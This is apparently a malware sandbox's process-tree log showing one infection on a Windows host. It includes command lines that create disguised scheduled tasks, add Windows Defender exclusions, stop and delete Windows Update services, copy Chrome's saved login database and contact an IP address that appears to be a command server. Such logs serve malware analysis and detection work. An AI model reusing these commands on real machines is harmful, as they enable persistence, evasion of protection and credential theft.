reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f
4⤵
PID:6100

C:\Users\Admin\AppData\Local\Temp\a\CL.exe
"C:\Users\Admin\AppData\Local\Temp\a\CL.exe"
2⤵
PID:12128

C:\Windows\SYSTEM32\schtasks.exe
"schtasks.exe" /create /tn Runtime Broker /tr "C:\ProgramData\KMSAuto\Runtime Broker.exe" /st 06:23 /du 23:59 /sc daily /ri 1 /f
3⤵
- Creates scheduled task(s)
PID:12604

C:\Users\Admin\AppData\Local\Temp\a\DefendUpdate1.exe
"C:\Users\Admin\AppData\Local\Temp\a\DefendUpdate1.exe"
2⤵
PID:11412

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /C choice /C Y /N /D Y /T 0 &Del C:\Users\Admin\AppData\Local\Temp\a\DefendUpdate1.exe
3⤵
PID:5616

C:\Windows\system32\choice.exe
choice /C Y /N /D Y /T 0
4⤵
PID:11312

C:\Users\Admin\AppData\Local\Temp\a\handsomezx.exe
"C:\Users\Admin\AppData\Local\Temp\a\handsomezx.exe"
2⤵
PID:12752

C:\Users\Admin\AppData\Local\Temp\a\handsomezx.exe
"C:\Users\Admin\AppData\Local\Temp\a\handsomezx.exe"
3⤵
PID:12576

C:\Users\Admin\AppData\Local\Temp\a\handsomezx.exe
"C:\Users\Admin\AppData\Local\Temp\a\handsomezx.exe"
3⤵
PID:12100

C:\Users\Admin\AppData\Local\Temp\a\handsomezx.exe
"C:\Users\Admin\AppData\Local\Temp\a\handsomezx.exe"
3⤵
PID:13376

C:\Users\Admin\AppData\Local\Temp\a\ChromeFIX_error1.exe
"C:\Users\Admin\AppData\Local\Temp\a\ChromeFIX_error1.exe"
2⤵
PID:12480

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\AppLaunch.exe"
3⤵
PID:11016

C:\Users\Admin\AppData\Local\Temp\a\cronometro.exe
"C:\Users\Admin\AppData\Local\Temp\a\cronometro.exe"
2⤵
PID:12408

C:\Users\Admin\AppData\Local\Temp\a\svc.exe
"C:\Users\Admin\AppData\Local\Temp\a\svc.exe"
2⤵
PID:8748

C:\Users\Admin\AppData\Local\Temp\a\cronoupdater.exe
"C:\Users\Admin\AppData\Local\Temp\a\cronoupdater.exe"
2⤵
PID:13228

C:\Users\Admin\AppData\Local\Temp\a\ColorMC.exe
"C:\Users\Admin\AppData\Local\Temp\a\ColorMC.exe"
2⤵
PID:12432

C:\Program Files\Java\jre1.8.0_66\bin\javaw.exe
"C:\Program Files\Java\jre1.8.0_66\bin\javaw.exe" -jar "C:\Users\Admin\AppData\Local\Temp\a\ColorMC.exe"
3⤵
PID:13620

C:\Program Files\Java\jre1.8.0_66\bin\javaw.exe
"C:\Program Files\Java\jre1.8.0_66\bin\javaw.exe" -Djdk.attach.allowAttachSelf -XX:+DisableAttachMechanism -Dlauncher.stacktrace=false -Dlauncher.dev=false -Dlauncher.debug=false -Xmx256M -cp C:\Users\Admin\AppData\Local\Temp\a\ColorMC.exe pro.gravit.launcher.colORmCjHNEaTF
4⤵
PID:1956

C:\Users\Admin\AppData\Local\Temp\a\ahmedzx.exe
"C:\Users\Admin\AppData\Local\Temp\a\ahmedzx.exe"
2⤵
PID:13732

C:\Users\Admin\AppData\Local\Temp\a\ahmedzx.exe
"C:\Users\Admin\AppData\Local\Temp\a\ahmedzx.exe"
3⤵
PID:3880

C:\Users\Admin\AppData\Local\Temp\a\CfHyZ4Bmoi.exe
"C:\Users\Admin\AppData\Local\Temp\a\CfHyZ4Bmoi.exe"
2⤵
PID:12856

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
3⤵
PID:13876

C:\Users\Admin\AppData\Local\Temp\a\CfHyZ4Bmoi1.exe
"C:\Users\Admin\AppData\Local\Temp\a\CfHyZ4Bmoi1.exe"
2⤵
PID:13476

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
3⤵
PID:12860

C:\Users\Admin\AppData\Local\Temp\a\stream.exe
"C:\Users\Admin\AppData\Local\Temp\a\stream.exe"
2⤵
PID:14008

C:\Users\Admin\AppData\Local\Temp\a\newtpp1.exe
"C:\Users\Admin\AppData\Local\Temp\a\newtpp1.exe"
2⤵
PID:11796

C:\Users\Admin\AppData\Local\Temp\a\LEM.exe
"C:\Users\Admin\AppData\Local\Temp\a\LEM.exe"
2⤵
PID:14152

C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\chainfontmonitordll\SdUS2qrV9.vbe"
3⤵
PID:1308

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\chainfontmonitordll\3LNEyhjSlf.bat" "
4⤵
PID:6244

C:\chainfontmonitordll\BlockNet.exe
"C:\chainfontmonitordll\BlockNet.exe"
5⤵
PID:6108

C:\Users\Admin\AppData\Local\Temp\a\meMin.exe
"C:\Users\Admin\AppData\Local\Temp\a\meMin.exe"
2⤵
PID:5092

C:\Users\Admin\AppData\Local\Temp\a\LEMON.exe
"C:\Users\Admin\AppData\Local\Temp\a\LEMON.exe"
2⤵
PID:13348

C:\Users\Admin\AppData\Local\Temp\a\LicGet.exe
"C:\Users\Admin\AppData\Local\Temp\a\LicGet.exe"
2⤵
PID:10596

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 10596 -s 1284
3⤵
- Program crash
PID:12464

C:\Users\Admin\AppData\Local\Temp\a\Kgilth-LIME-3.exe
"C:\Users\Admin\AppData\Local\Temp\a\Kgilth-LIME-3.exe"
2⤵
PID:13132

C:\Users\Admin\AppData\Local\Temp\a\Rrobknnz-LIMETORRENTS.exe
"C:\Users\Admin\AppData\Local\Temp\a\Rrobknnz-LIMETORRENTS.exe"
2⤵
PID:11224

C:\Users\Admin\AppData\Local\Temp\a\Kgilth-LIME-2.exe
"C:\Users\Admin\AppData\Local\Temp\a\Kgilth-LIME-2.exe"
2⤵
PID:13816

C:\Users\Admin\AppData\Local\Temp\a\Z2K-1.exe
"C:\Users\Admin\AppData\Local\Temp\a\Z2K-1.exe"
2⤵
PID:12324

C:\Users\Admin\AppData\Local\Temp\a\TPB-1.exe
"C:\Users\Admin\AppData\Local\Temp\a\TPB-1.exe"
2⤵
PID:5036

C:\Users\Admin\AppData\Local\Temp\a\Ntprfgupx-2.exe
"C:\Users\Admin\AppData\Local\Temp\a\Ntprfgupx-2.exe"
2⤵
PID:9200

C:\Users\Admin\AppData\Local\Temp\a\lab.exe
"C:\Users\Admin\AppData\Local\Temp\a\lab.exe"
2⤵
PID:5020

C:\Users\Admin\AppData\Local\Temp\9b52a1ac2c\oneetx.exe
C:\Users\Admin\AppData\Local\Temp\9b52a1ac2c\oneetx.exe
1⤵
PID:3944

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#llzqlmcx#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'Windows Upgrade Manager' /tr '''C:\Users\Admin\Windows Upgrade\wupgrdsv.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\Windows Upgrade\wupgrdsv.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'Windows Upgrade Manager' -RunLevel 'Highest' -Force; }
1⤵
PID:5844

C:\Windows\SysWOW64\svchost.exe
"C:\Windows\SysWOW64\svchost.exe"
1⤵
PID:5680

C:\Windows\SysWOW64\cmd.exe
/c del "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
2⤵
PID:380

C:\Windows\System32\schtasks.exe
C:\Windows\System32\schtasks.exe /run /tn "Windows Upgrade Manager"
1⤵
PID:2444

C:\Users\Admin\AppData\Local\Temp\c3912af058\oneetx.exe
C:\Users\Admin\AppData\Local\Temp\c3912af058\oneetx.exe
1⤵
PID:5416

C:\Windows\SysWOW64\mstsc.exe
"C:\Windows\SysWOW64\mstsc.exe"
1⤵
PID:6092

C:\Windows\SysWOW64\cmd.exe
/c del "C:\Users\Admin\AppData\Local\Temp\onzqy.exe"
2⤵
PID:6496

C:\Windows\SysWOW64\ipconfig.exe
"C:\Windows\SysWOW64\ipconfig.exe"
1⤵
- Gathers network information
PID:2044

C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" HiddenEyeZ_Client 5.75.162.221 8081 mPgxExkLE
1⤵
PID:252

C:\Windows\explorer.exe
"C:\Windows\explorer.exe"
1⤵
PID:5572

C:\Windows\system32\ctfmon.exe
ctfmon.exe
2⤵
PID:8040

C:\Windows\SysWOW64\raserver.exe
"C:\Windows\SysWOW64\raserver.exe"
2⤵
PID:6240

C:\Windows\SysWOW64\control.exe
"C:\Windows\SysWOW64\control.exe"
2⤵
PID:7348

C:\Windows\SysWOW64\cmd.exe
/c del "C:\Users\Admin\AppData\Local\Temp\a\offbinzx.exe"
3⤵
PID:3836

C:\Program Files (x86)\Mqffd\_nsdufotapxfw.exe
"C:\Program Files (x86)\Mqffd\_nsdufotapxfw.exe"
2⤵
PID:9516

C:\Windows\SysWOW64\mstsc.exe
"C:\Windows\SysWOW64\mstsc.exe"
1⤵
PID:7476

C:\Users\Admin\AppData\Local\Temp\c3912af058\oneetx.exe
C:\Users\Admin\AppData\Local\Temp\c3912af058\oneetx.exe
1⤵
PID:7676

C:\Users\Admin\AppData\Roaming\svchost\svchost.exe
C:\Users\Admin\AppData\Roaming\svchost\svchost.exe
1⤵
PID:4732

C:\Users\Admin\AppData\Roaming\svchost\svchost.exe
"C:\Users\Admin\AppData\Roaming\svchost\svchost.exe"
2⤵
PID:8860

C:\Windows\SysWOW64\cmd.exe
"cmd" /c mkdir "C:\Users\Admin\AppData\Roaming\svchost"
2⤵
PID:7904

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
3⤵
- Executes dropped EXE
PID:4380

C:\Windows\SysWOW64\cmd.exe
"cmd" /c schtasks /create /sc minute /mo 1 /tn "Nafifas" /tr "'C:\Users\Admin\AppData\Roaming\svchost\svchost.exe'" /f
2⤵
PID:7636

C:\Windows\SysWOW64\schtasks.exe
schtasks /create /sc minute /mo 1 /tn "Nafifas" /tr "'C:\Users\Admin\AppData\Roaming\svchost\svchost.exe'" /f
3⤵
- Creates scheduled task(s)
PID:8732

C:\Windows\SysWOW64\cmd.exe
"cmd" /c copy "C:\Users\Admin\AppData\Roaming\svchost\svchost.exe" "C:\Users\Admin\AppData\Roaming\svchost\svchost.exe"
2⤵
PID:6628

C:\Windows\SYSTEM32\CMD.EXE
C:\Windows\SYSTEM32\CMD.EXE /c taskkill /im chrome.exe /f
1⤵
PID:7384

C:\Windows\system32\taskkill.exe
taskkill /im chrome.exe /f
2⤵
- Kills process with taskkill
PID:10660

C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
"C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe" -ServerName:CortanaUI.AppXa50dqqa5gqv4a428c9y1jjw7m3btvepj.mca
1⤵
PID:7180

C:\Windows\SYSTEM32\CMD.EXE
C:\Windows\SYSTEM32\CMD.EXE /c more "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences" > "C:\Users\Admin\AppData\Local\Temp\__data" && echo 0 > "C:\Users\Admin\AppData\Local\Temp\__data1"
1⤵
PID:2168

C:\Windows\system32\more.com
more "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences"
2⤵
PID:7296

C:\Windows\SYSTEM32\CMD.EXE
C:\Windows\SYSTEM32\CMD.EXE /c more "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences" > "C:\Users\Admin\AppData\Local\Temp\__data" && echo 0 > "C:\Users\Admin\AppData\Local\Temp\__data1"
1⤵
PID:8604

C:\Windows\system32\more.com
more "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences"
2⤵
PID:11100

C:\Windows\SysWOW64\cscript.exe
"C:\Windows\SysWOW64\cscript.exe"
1⤵
PID:8948

C:\Windows\SysWOW64\cmd.exe
/c del "C:\Users\Admin\AppData\Local\Temp\a\kimzx.exe"
2⤵
PID:8872

C:\Windows\SysWOW64\autoconv.exe
"C:\Windows\SysWOW64\autoconv.exe"
2⤵
PID:348

C:\Windows\SysWOW64\mstsc.exe
"C:\Windows\SysWOW64\mstsc.exe"
2⤵
PID:8448

C:\Program Files\Mozilla Firefox\Firefox.exe
"C:\Program Files\Mozilla Firefox\Firefox.exe"
3⤵
PID:10252

C:\Windows\SysWOW64\rundll32.exe
"C:\Windows\SysWOW64\rundll32.exe"
1⤵
PID:4768

C:\Windows\SysWOW64\cmd.exe
/c del "C:\Users\Admin\AppData\Local\Temp\a\nellyzx.exe"
2⤵
- Modifies Windows Defender Real-time Protection settings
- Windows security modification
PID:3744

C:\Windows\SysWOW64\cmd.exe
/c copy "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Login Data" "C:\Users\Admin\AppData\Local\Temp\DB1" /V
2⤵
PID:11188

C:\Program Files\Mozilla Firefox\Firefox.exe
"C:\Program Files\Mozilla Firefox\Firefox.exe"
2⤵
PID:4400

C:\Windows\SysWOW64\cmstp.exe
"C:\Windows\SysWOW64\cmstp.exe"
1⤵
PID:2600

C:\Windows\SysWOW64\chkdsk.exe
"C:\Windows\SysWOW64\chkdsk.exe"
1⤵
PID:9060

C:\Windows\SysWOW64\cmd.exe
/c del "C:\Users\Admin\AppData\Local\Temp\a\stevezx.exe"
2⤵
PID:3476

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
1⤵
PID:5328

C:\Windows\SysWOW64\chkdsk.exe
"C:\Windows\SysWOW64\chkdsk.exe"
2⤵
PID:6268

C:\Program Files\Mozilla Firefox\Firefox.exe
"C:\Program Files\Mozilla Firefox\Firefox.exe"
3⤵
PID:8956

C:\Users\Admin\AppData\Local\Temp\c3912af058\oneetx.exe
C:\Users\Admin\AppData\Local\Temp\c3912af058\oneetx.exe
1⤵
PID:3000

C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc
1⤵
PID:9564

C:\Windows\System32\sc.exe
sc stop UsoSvc
2⤵
- Launches sc.exe
PID:9660

C:\Windows\System32\sc.exe
sc stop WaaSMedicSvc
2⤵
- Launches sc.exe
PID:9532

C:\Windows\System32\sc.exe
sc stop wuauserv
2⤵
- Launches sc.exe
PID:6700

C:\Windows\System32\sc.exe
sc stop bits
2⤵
- Launches sc.exe
PID:10320

C:\Windows\System32\sc.exe
sc stop dosvc
2⤵
- Launches sc.exe
PID:10704

C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
1⤵
PID:7304

C:\Windows\System32\powercfg.exe
powercfg /x -hibernate-timeout-ac 0
2⤵
PID:10200

C:\Windows\System32\powercfg.exe
powercfg /x -hibernate-timeout-dc 0
2⤵
PID:7084

C:\Windows\System32\powercfg.exe
powercfg /x -standby-timeout-ac 0
2⤵
PID:8404

C:\Windows\System32\powercfg.exe
powercfg /x -standby-timeout-dc 0
2⤵
PID:10420

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#wdovveuwy#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }
1⤵
PID:7532

C:\Users\Admin\AppData\Local\Temp\c3912af058\oneetx.exe
C:\Users\Admin\AppData\Local\Temp\c3912af058\oneetx.exe
1⤵
PID:8736

C:\Users\Admin\AppData\Roaming\svchost\svchost.exe
C:\Users\Admin\AppData\Roaming\svchost\svchost.exe
1⤵
PID:10032

C:\Users\Admin\AppData\Roaming\svchost\svchost.exe
"C:\Users\Admin\AppData\Roaming\svchost\svchost.exe"
2⤵
PID:9044

C:\Windows\SysWOW64\cmd.exe
"cmd" /c copy "C:\Users\Admin\AppData\Roaming\svchost\svchost.exe" "C:\Users\Admin\AppData\Roaming\svchost\svchost.exe"
2⤵
PID:8064

C:\Windows\SysWOW64\cmd.exe
"cmd" /c schtasks /create /sc minute /mo 1 /tn "Nafifas" /tr "'C:\Users\Admin\AppData\Roaming\svchost\svchost.exe'" /f
2⤵
PID:10652

C:\Windows\SysWOW64\schtasks.exe
schtasks /create /sc minute /mo 1 /tn "Nafifas" /tr "'C:\Users\Admin\AppData\Roaming\svchost\svchost.exe'" /f
3⤵
- Creates scheduled task(s)
PID:4716

C:\Windows\SysWOW64\cmd.exe
"cmd" /c mkdir "C:\Users\Admin\AppData\Roaming\svchost"
2⤵
PID:5436

C:\Windows\System32\schtasks.exe
C:\Windows\System32\schtasks.exe /run /tn "GoogleUpdateTaskMachineQC"
1⤵
PID:10160

C:\Windows\SysWOW64\cscript.exe
"C:\Windows\SysWOW64\cscript.exe"
1⤵
PID:10772

C:\Windows\SysWOW64\cmd.exe
/c del "C:\Users\Admin\AppData\Local\Temp\a\atlaszx.exe"
2⤵
PID:10672

C:\Windows\SysWOW64\autochk.exe
"C:\Windows\SysWOW64\autochk.exe"
2⤵
PID:9520

C:\Windows\SysWOW64\autoconv.exe
"C:\Windows\SysWOW64\autoconv.exe"
2⤵
PID:356

C:\Windows\SysWOW64\wlanext.exe
"C:\Windows\SysWOW64\wlanext.exe"
2⤵
PID:10388

C:\Program Files\Mozilla Firefox\Firefox.exe
"C:\Program Files\Mozilla Firefox\Firefox.exe"
3⤵
PID:10244

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 10244 -s 480
4⤵
- Program crash
PID:10748

C:\Windows\SysWOW64\chkdsk.exe
"C:\Windows\SysWOW64\chkdsk.exe"
2⤵
PID:11356

C:\Program Files\Mozilla Firefox\Firefox.exe
"C:\Program Files\Mozilla Firefox\Firefox.exe"
3⤵
PID:11756

C:\Users\Admin\AppData\Local\Temp\c3912af058\oneetx.exe
C:\Users\Admin\AppData\Local\Temp\c3912af058\oneetx.exe
1⤵
PID:9932

C:\Users\Admin\AppData\Roaming\Microsoft\config\runtime.exe
C:\Users\Admin\AppData\Roaming\Microsoft\config\runtime.exe
1⤵
PID:6832

C:\Users\Admin\AppData\Roaming\svchost\svchost.exe
C:\Users\Admin\AppData\Roaming\svchost\svchost.exe
1⤵
PID:4736

C:\Users\Admin\AppData\Roaming\svchost\svchost.exe
"C:\Users\Admin\AppData\Roaming\svchost\svchost.exe"
2⤵
PID:8496

C:\Windows\SysWOW64\cmd.exe
"cmd" /c mkdir "C:\Users\Admin\AppData\Roaming\svchost"
2⤵
PID:2376

C:\Windows\SysWOW64\cmd.exe
"cmd" /c schtasks /create /sc minute /mo 1 /tn "Nafifas" /tr "'C:\Users\Admin\AppData\Roaming\svchost\svchost.exe'" /f
2⤵
PID:10728

C:\Windows\SysWOW64\schtasks.exe
schtasks /create /sc minute /mo 1 /tn "Nafifas" /tr "'C:\Users\Admin\AppData\Roaming\svchost\svchost.exe'" /f
3⤵
- Creates scheduled task(s)
PID:12980

C:\Windows\SysWOW64\cmd.exe
"cmd" /c copy "C:\Users\Admin\AppData\Roaming\svchost\svchost.exe" "C:\Users\Admin\AppData\Roaming\svchost\svchost.exe"
2⤵
PID:9024

C:\Users\Admin\AppData\Local\Temp\c3912af058\oneetx.exe
C:\Users\Admin\AppData\Local\Temp\c3912af058\oneetx.exe
1⤵
PID:7752

C:\Windows\SysWOW64\explorer.exe
"C:\Windows\SysWOW64\explorer.exe"
1⤵
PID:10812

C:\Users\Admin\AppData\Local\Microsoft\config\runtime.exe
C:\Users\Admin\AppData\Local\Microsoft\config\runtime.exe
1⤵
PID:12108

C:\Users\Admin\AppData\Local\Temp\c3912af058\oneetx.exe
C:\Users\Admin\AppData\Local\Temp\c3912af058\oneetx.exe
1⤵
PID:12088

C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
"C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe" -ServerName:CortanaUI.AppXa50dqqa5gqv4a428c9y1jjw7m3btvepj.mca
1⤵
PID:12252

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
1⤵
PID:11688

C:\Windows\system32\certreq.exe
"C:\Windows\system32\certreq.exe"
1⤵
PID:11800

C:\Users\Admin\AppData\Local\Temp\Microsoft\config\runtime.exe
C:\Users\Admin\AppData\Local\Temp\Microsoft\config\runtime.exe
1⤵
PID:8472

C:\Users\Admin\AppData\Local\Temp\10180c8ca3\oneetx.exe
C:\Users\Admin\AppData\Local\Temp\10180c8ca3\oneetx.exe
1⤵
PID:11668

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
1⤵
PID:9660

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#wsyzqeupt#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'NoteUpdateTaskMachineQC' /tr '''C:\Program Files\Notepad\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Notepad\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'NoteUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "NoteUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Notepad\Chrome\updater.exe' }
1⤵
PID:7280

C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
1⤵
PID:11888

C:\Windows\System32\sc.exe
sc stop UsoSvc
2⤵
- Launches sc.exe
PID:13124

C:\Windows\System32\sc.exe
sc stop WaaSMedicSvc
2⤵
- Launches sc.exe
PID:12920

C:\Windows\System32\sc.exe
sc stop wuauserv
2⤵
- Launches sc.exe
PID:12488

C:\Windows\System32\sc.exe
sc stop bits
2⤵
- Launches sc.exe
PID:13472

C:\Windows\System32\sc.exe
sc stop dosvc
2⤵
- Launches sc.exe
PID:14208

C:\Windows\System32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f
2⤵
PID:13404

C:\Windows\System32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f
2⤵
PID:11260

C:\Windows\System32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f
2⤵
PID:5748

C:\Windows\System32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f
2⤵
PID:9088

C:\Windows\System32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
2⤵
PID:6664

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
1⤵
PID:11784

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
1⤵
PID:12388

C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
1⤵
PID:12420

C:\Windows\System32\sc.exe
sc stop UsoSvc
2⤵
- Launches sc.exe
PID:12720

C:\Windows\System32\sc.exe
sc stop WaaSMedicSvc
2⤵
- Launches sc.exe
PID:13456

C:\Windows\System32\sc.exe
sc stop wuauserv
2⤵
- Launches sc.exe
PID:10412

C:\Windows\System32\sc.exe
sc stop bits
2⤵
- Launches sc.exe
PID:11728

C:\Windows\System32\sc.exe
sc stop dosvc
2⤵
- Launches sc.exe
PID:12452

C:\Windows\System32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f
2⤵
PID:4388

C:\Windows\System32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f
2⤵
PID:7524

C:\Windows\System32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f
2⤵
PID:7524

C:\Windows\System32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f
2⤵
PID:6456

C:\Windows\System32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
2⤵
PID:4884

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#xpzzfzp#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Google\Chrome\updater.exe' }
1⤵
PID:12400

C:\Windows\SysWOW64\netsh.exe
"C:\Windows\SysWOW64\netsh.exe"
1⤵
PID:12204

C:\Windows\SysWOW64\cmd.exe
/c del "C:\Users\Admin\AppData\Local\Temp\a\dialozx.exe"
2⤵
PID:13136

C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
1⤵
PID:13016

C:\Windows\System32\powercfg.exe
powercfg /x -hibernate-timeout-ac 0
2⤵
PID:11080

C:\Windows\System32\powercfg.exe
powercfg /x -hibernate-timeout-dc 0
2⤵
PID:11324

C:\Windows\System32\powercfg.exe
powercfg /x -standby-timeout-ac 0
2⤵
PID:8840

C:\Windows\System32\powercfg.exe
powercfg /x -standby-timeout-dc 0
2⤵
PID:8988

